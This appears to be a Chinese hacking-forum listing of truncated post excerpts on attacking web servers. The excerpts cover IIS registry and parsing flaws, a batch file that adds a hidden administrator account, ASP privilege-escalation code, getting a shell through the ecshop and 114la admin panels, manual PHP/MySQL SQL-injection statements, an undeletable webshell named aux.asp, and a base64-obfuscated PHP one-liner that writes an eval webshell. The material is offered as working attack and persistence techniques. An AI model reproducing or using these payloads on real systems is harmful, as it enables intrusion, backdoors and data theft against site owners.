IIS注册表全版本泄漏用户路径和FTP用户名漏洞
此洞由FAKER AND 啊迪明发现!并做测试! 标题蛮长的!哈哈~ 这个漏洞貌似鸡肋,但是也有强大的用处。但是懂得怎么利用他,完全靠得自己,我只是给一个小小思路。 进入主题! 重要注册表: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtua...
IIS7.0畸形解析漏洞通杀0day
IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0 Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。 临时解决办法:关闭cgi.fix_pathinfo为0 ________...
几种留后门技巧
建立一个别人永远删不掉的管理员用户 操作步骤: 1、在自己电脑里面建立一个.txt文本文件. 2、在里面输入内容 @echo off net user xixi 123456 /add 注释:前面xixi是用户名后面123456是密码; net localgroup administrators xixi /add 3、把这个文件保存,更改后缀为xixi.bat 注释:前面名字随便,后面格式一定要...
无wscript.shell组件提权又一个方法
代码: <object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <%if err then%> <object runat=server id=oScriptlhn scope=page cla...
ecshop后台拿shell 个人总结七种方法
最近想弄个ecshop做销售。装好ecshop V2.7.2版本之后,测试后台拿shell。 本人整理给自己看的,大家飘过就好。BY:黑猫 ecshop后台拿shell 个人总结七种方法 一、 系统==>数据库管理==>sql查询(可爆出物理路径): ==============创建表失败,导不出shell====================== show databases; u...
跨库查询一定需要绝对路径吗?
找到一点关于不要绝对路径的东西,希望讨论一下! ACCESS的跨库是通过中括号实现的,包括路径,密码设置等;跨库的前提是已经打开了一个Connection。 问题说明: 有时需要在两个或三个数据库的表中,通过相关关键字,查询获取所需记录集,用一般的SQL查询语句是实现不了的,可通过ACCESS的跨库查询功能实现。 解决方法: 例如"admin"和"rain"两张表是在不同的数据库中的,具体查询方法...
PHP+MySQL 手工注入语句
暴字段长度 order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置 and 1=2 union select 1,2,3,4,5…..n/* 利用内置函数暴数据库信息 version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用): and 1=2 union all select ver...
新方法打造永不被删除的webshell
Windows 下不能够以下面这些字样来命名文件/文件夹,包括:“aux”,“com1”“com2”“prn”“con”和“nul”等,但是通过cmd下是可以创建此类文件夹的,使用copy命令即可实现: D:\wwwroot>copy rootkit.asp \\.\D:\\wwwroot\aux.asp 已复制 1 个文件。 D:\AspWebServer\wwwroot>dir 驱动器 D 中...
114啦网址导航v1.15后台拿shell
我测试的版本是V1.15 网上都是V1.13的 于是下载回来看了下 。 后台 点击模块管理--->分类模块-->添加模块 直接添加后缀为php或asp的 都可以 内容就是马的内容。 马地址 在admin\tpls\tpls\main\green\class目录下
PHP一句话变型
<?php @fputs(fopen(base64_decode(bG9zdC5waHA=),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==));?> <script language="php">@fputs(fopen(base64_decode(bG9zdC5waHA=),w),bas...